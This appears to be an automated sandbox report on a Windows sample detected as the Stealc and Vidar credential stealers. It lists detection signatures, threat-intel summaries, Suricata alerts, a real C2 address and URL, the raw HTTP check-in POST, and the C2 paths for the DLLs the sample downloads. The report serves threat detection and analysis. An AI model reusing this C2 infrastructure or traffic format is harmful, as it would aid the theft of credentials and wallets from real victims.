Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1501220
MD5:	78bdea9e949a906de71a9e7e392949e8
SHA1:	1817e5f65fddb23cd1c2f3e6ad45844045b3e72c
SHA256:	9c6971462e3db561147b9a7291e611b275c9053af1c1aa83abe5327ab197739f
Tags:	exe
Infos:

Detection

Stealc, Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Detected unpacking (changes PE section rights)

Found malware configuration

Suricata IDS alerts for network traffic

Yara detected Powershell download and execute

Yara detected Stealc

Yara detected Vidar stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Found evasive API chain (may stop execution after checking locale)

Found many strings related to Crypto-Wallets (likely being stolen)

Hides threads from debuggers

Machine Learning detection for sample

PE file contains section with special chars

Searches for specific processes (likely to inject)

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Tries to steal Mail credentials (via file / registry access)

Checks for debuggers (devices)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to create guard pages, often used to hinder reverse engineering and debugging

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Detected potential crypto function

Downloads executable code via HTTP

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Entry point lies outside standard sections

Extensive use of GetProcAddress (often used to hide API calls)

Found dropped PE file which has not been started or loaded

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

file.exe (PID: 2888 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 78BDEA9E949A906DE71A9E7E392949E8)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/ https://cocomelonc.github.io/book/2023/12/13/malwild-book.html https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-stealc-cbe5c94b84af	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: StealC

{"C2 url": "185.215.113.100/e2b1563c6670f193.php"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Stealc_1	Yara detected Stealc	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000000.00000002.2265661431.00000000011EE000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000000.00000002.2265661431.0000000001263000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: file.exe PID: 2888	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: file.exe PID: 2888	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: file.exe PID: 2888	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: file.exe PID: 2888	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Click to see the 1 entries

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern HCa - Source IP: 192.168.2.5 - Destination IP: 185.215.113.100

Timestamp:	2024-08-29T15:42:54.875200+0200
SID:	2803304
Severity:	3
Source Port:	49704
Destination Port:	80
Protocol:	TCP
Classtype:	Unknown Traffic

ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in - Source IP: 192.168.2.5 - Destination IP: 185.215.113.100

Timestamp:	2024-08-29T15:42:47.521879+0200
SID:	2044243
Severity:	1
Source Port:	49704
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE Win32/Stealc Submitting System Information to C2 - Source IP: 192.168.2.5 - Destination IP: 185.215.113.100

Timestamp:	2024-08-29T15:42:49.113647+0200
SID:	2044248
Severity:	1
Source Port:	49704
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Common Downloader Header Pattern HCa - Source IP: 192.168.2.5 - Destination IP: 185.215.113.100

Timestamp:	2024-08-29T15:42:57.225876+0200
SID:	2803304
Severity:	3
Source Port:	49704
Destination Port:	80
Protocol:	TCP
Classtype:	Unknown Traffic

ETPRO MALWARE Common Downloader Header Pattern HCa - Source IP: 192.168.2.5 - Destination IP: 185.215.113.100

Timestamp:	2024-08-29T15:42:56.658192+0200
SID:	2803304
Severity:	3
Source Port:	49704
Destination Port:	80
Protocol:	TCP
Classtype:	Unknown Traffic

ET MALWARE Win32/Stealc Active C2 Responding with browsers Config - Source IP: 185.215.113.100 - Destination IP: 192.168.2.5

Timestamp:	2024-08-29T15:42:47.773199+0200
SID:	2044245
Severity:	1
Source Port:	80
Destination Port:	49704
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE Win32/Stealc Requesting browsers Config from C2 - Source IP: 192.168.2.5 - Destination IP: 185.215.113.100

Timestamp:	2024-08-29T15:42:47.766927+0200
SID:	2044244
Severity:	1
Source Port:	49704
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Common Downloader Header Pattern HCa - Source IP: 192.168.2.5 - Destination IP: 185.215.113.100

Timestamp:	2024-08-29T15:42:58.879083+0200
SID:	2803304
Severity:	3
Source Port:	49704
Destination Port:	80
Protocol:	TCP
Classtype:	Unknown Traffic

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config - Source IP: 185.215.113.100 - Destination IP: 192.168.2.5

Timestamp:	2024-08-29T15:42:48.020664+0200
SID:	2044247
Severity:	1
Source Port:	80
Destination Port:	49704
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE Win32/Stealc Requesting plugins Config from C2 - Source IP: 192.168.2.5 - Destination IP: 185.215.113.100

Timestamp:	2024-08-29T15:42:48.013618+0200
SID:	2044246
Severity:	1
Source Port:	49704
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Common Downloader Header Pattern HCa - Source IP: 192.168.2.5 - Destination IP: 185.215.113.100

Timestamp:	2024-08-29T15:42:59.238652+0200
SID:	2803304
Severity:	3
Source Port:	49704
Destination Port:	80
Protocol:	TCP
Classtype:	Unknown Traffic

ETPRO MALWARE Common Downloader Header Pattern HCa - Source IP: 192.168.2.5 - Destination IP: 185.215.113.100

Timestamp:	2024-08-29T15:42:49.611902+0200
SID:	2803304
Severity:	3
Source Port:	49704
Destination Port:	80
Protocol:	TCP
Classtype:	Unknown Traffic

ETPRO MALWARE Common Downloader Header Pattern HCa - Source IP: 192.168.2.5 - Destination IP: 185.215.113.100

Timestamp:	2024-08-29T15:42:56.188741+0200
SID:	2803304
Severity:	3
Source Port:	49704
Destination Port:	80
Protocol:	TCP
Classtype:	Unknown Traffic

HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AEHIJDAFBKFHIDGCFBFCHost: 185.215.113.100Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 45 48 49 4a 44 41 46 42 4b 46 48 49 44 47 43 46 42 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 37 45 33 46 32 34 33 39 43 39 30 31 39 34 32 37 37 39 37 33 36 0d 0a 2d 2d 2d 2d 2d 2d 41 45 48 49 4a 44 41 46 42 4b 46 48 49 44 47 43 46 42 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6c 65 76 61 0d 0a 2d 2d 2d 2d 2d 2d 41 45 48 49 4a 44 41 46 42 4b 46 48 49 44 47 43 46 42 46 43 2d 2d 0d 0a Data Ascii: ------AEHIJDAFBKFHIDGCFBFCContent-Disposition: form-data; name="hwid"57E3F2439C901942779736------AEHIJDAFBKFHIDGCFBFCContent-Disposition: form-data; name="build"leva------AEHIJDAFBKFHIDGCFBFC--

Source: file.exe, 00000000.00000002.2264804271.0000000000AFD000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.2265661431.00000000011EE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2264804271.000000000098C000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.100
Source: file.exe, 00000000.00000002.2265661431.00000000011EE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.100$
Source: file.exe, 00000000.00000002.2265661431.0000000001247000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.100/
Source: file.exe, 00000000.00000002.2265661431.0000000001247000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.100/0d60be0de163924d/freebl3.dll
Source: file.exe, 00000000.00000002.2265661431.0000000001247000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.100/0d60be0de163924d/mozglue.dll
Source: file.exe, 00000000.00000002.2265661431.0000000001247000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.100/0d60be0de163924d/mozglue.dllh
Source: file.exe, 00000000.00000002.2265661431.0000000001247000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.100/0d60be0de163924d/msvcp140.dll
Source: file.exe, 00000000.00000002.2265661431.0000000001247000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.100/0d60be0de163924d/nss3.dll
Source: file.exe, 00000000.00000002.2265661431.0000000001247000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.100/0d60be0de163924d/nss3.dllP
Source: file.exe, 00000000.00000002.2265661431.0000000001247000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.100/0d60be0de163924d/softokn3.dll
Source: file.exe, 00000000.00000002.2265661431.0000000001247000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.100/0d60be0de163924d/softokn3.dll4
Source: file.exe, 00000000.00000002.2264804271.00000000009BA000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.2265661431.0000000001247000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.100/0d60be0de163924d/sqlite3.dll
Source: file.exe, 00000000.00000002.2265661431.0000000001247000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.100/0d60be0de163924d/sqlite3.dll~
Source: file.exe, 00000000.00000002.2265661431.0000000001247000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.100/0d60be0de163924d/vcruntime140.dll
Source: file.exe, 00000000.00000002.2265661431.00000000012B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.100/0d60be0de163924d/vcruntime140.dllJ
Source: file.exe, 00000000.00000002.2265661431.00000000012B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.100/0d60be0de163924d/vcruntime140.dllZ
Source: file.exe, 00000000.00000002.2265661431.00000000012B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.100/0d60be0de163924d/vcruntime140.dllj
Source: file.exe, 00000000.00000002.2265661431.00000000012B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.100/0d60be0de163924d/vcruntime140.dllz
Source: file.exe, 00000000.00000002.2265661431.0000000001247000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.100/e2b1563c6670f193.php
Source: file.exe, 00000000.00000002.2265661431.0000000001247000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.100/e2b1563c6670f193.php$
Source: file.exe, 00000000.00000002.2265661431.0000000001247000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.100/e2b1563c6670f193.php1
Source: file.exe, 00000000.00000002.2265661431.00000000011E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.100/e2b1563c6670f193.php33
Source: file.exe, 00000000.00000002.2265661431.00000000011E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.100/e2b1563c6670f193.php3P
Source: file.exe, 00000000.00000002.2265661431.0000000001247000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.100/e2b1563c6670f193.php8
Source: file.exe, 00000000.00000002.2265661431.00000000011E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.100/e2b1563c6670f193.php=C
Source: file.exe, 00000000.00000002.2265661431.00000000011E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.100/e2b1563c6670f193.php=I
Source: file.exe, 00000000.00000002.2265661431.0000000001263000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.100/e2b1563c6670f193.phpBrowser
Source: file.exe, 00000000.00000002.2265661431.00000000011E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.100/e2b1563c6670f193.phpGO4
Source: file.exe, 00000000.00000002.2265661431.0000000001247000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.100/e2b1563c6670f193.phpH
Source: file.exe, 00000000.00000002.2265661431.0000000001247000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.100/e2b1563c6670f193.phpP
Source: file.exe, 00000000.00000002.2265661431.00000000011E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.100/e2b1563c6670f193.phpS_
Source: file.exe, 00000000.00000002.2265661431.00000000011E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.100/e2b1563c6670f193.phpe
Source: file.exe, 00000000.00000002.2265661431.00000000011E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.100/e2b1563c6670f193.phpf
Source: file.exe, 00000000.00000002.2264804271.0000000000AFD000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.100/e2b1563c6670f193.phpion:
Source: file.exe, 00000000.00000002.2265661431.0000000001263000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.100/e2b1563c6670f193.phpive
Source: file.exe, 00000000.00000002.2265661431.00000000011E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.100/e2b1563c6670f193.phpn
Source: file.exe, 00000000.00000002.2265661431.0000000001263000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.100/e2b1563c6670f193.phppl
Source: file.exe, 00000000.00000002.2264804271.0000000000AFD000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.100e2b1563c6670f193.phpion:
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: file.exe, file.exe, 00000000.00000002.2289961189.000000006C6ED000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: file.exe, 00000000.00000002.2278395137.000000001D64D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2289768515.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: file.exe, 00000000.00000002.2265661431.0000000001263000.00000004.00000020.00020000.00000000.sdmp, HJECAAKK.0.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: file.exe, 00000000.00000002.2265661431.00000000012B2000.00000004.00000020.00020000.00000000.sdmp, AFHDAKJKFCFBGCBGDHCB.0.dr	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
Source: file.exe, 00000000.00000002.2265661431.00000000012B2000.00000004.00000020.00020000.00000000.sdmp, AFHDAKJKFCFBGCBGDHCB.0.dr	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
Source: HJECAAKK.0.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: file.exe, 00000000.00000002.2265661431.0000000001263000.00000004.00000020.00020000.00000000.sdmp, HJECAAKK.0.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000000.00000002.2265661431.0000000001263000.00000004.00000020.00020000.00000000.sdmp, HJECAAKK.0.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: file.exe, 00000000.00000002.2265661431.00000000012B2000.00000004.00000020.00020000.00000000.sdmp, AFHDAKJKFCFBGCBGDHCB.0.dr	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: file.exe, 00000000.00000002.2265661431.00000000012B2000.00000004.00000020.00020000.00000000.sdmp, AFHDAKJKFCFBGCBGDHCB.0.dr	String found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
Source: HJECAAKK.0.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: HJECAAKK.0.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: HJECAAKK.0.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: AFHDAKJKFCFBGCBGDHCB.0.dr	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: https://mozilla.org0/
Source: DBKKFCBAKKFBGCBFHJDGDGDHCA.0.dr	String found in binary or memory: https://support.mozilla.org
Source: DBKKFCBAKKFBGCBFHJDGDGDHCA.0.dr	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: DBKKFCBAKKFBGCBFHJDGDGDHCA.0.dr	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL
Source: file.exe, 00000000.00000002.2265661431.00000000012B2000.00000004.00000020.00020000.00000000.sdmp, AFHDAKJKFCFBGCBGDHCB.0.dr	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
Source: file.exe, 00000000.00000002.2265661431.00000000012B2000.00000004.00000020.00020000.00000000.sdmp, AFHDAKJKFCFBGCBGDHCB.0.dr	String found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: file.exe, 00000000.00000002.2265661431.0000000001263000.00000004.00000020.00020000.00000000.sdmp, HJECAAKK.0.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: HJECAAKK.0.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: DBKKFCBAKKFBGCBFHJDGDGDHCA.0.dr	String found in binary or memory: https://www.mozilla.org
Source: file.exe, 00000000.00000002.2264804271.000000000098C000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: DBKKFCBAKKFBGCBFHJDGDGDHCA.0.dr	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: file.exe, 00000000.00000002.2264804271.000000000098C000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: DBKKFCBAKKFBGCBFHJDGDGDHCA.0.dr	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: file.exe, 00000000.00000002.2264804271.000000000098C000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: file.exe, 00000000.00000003.2198443466.000000002F8CE000.00000004.00000020.00020000.00000000.sdmp, DBKKFCBAKKFBGCBFHJDGDGDHCA.0.dr	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: file.exe, 00000000.00000002.2264804271.000000000098C000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/ZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBM
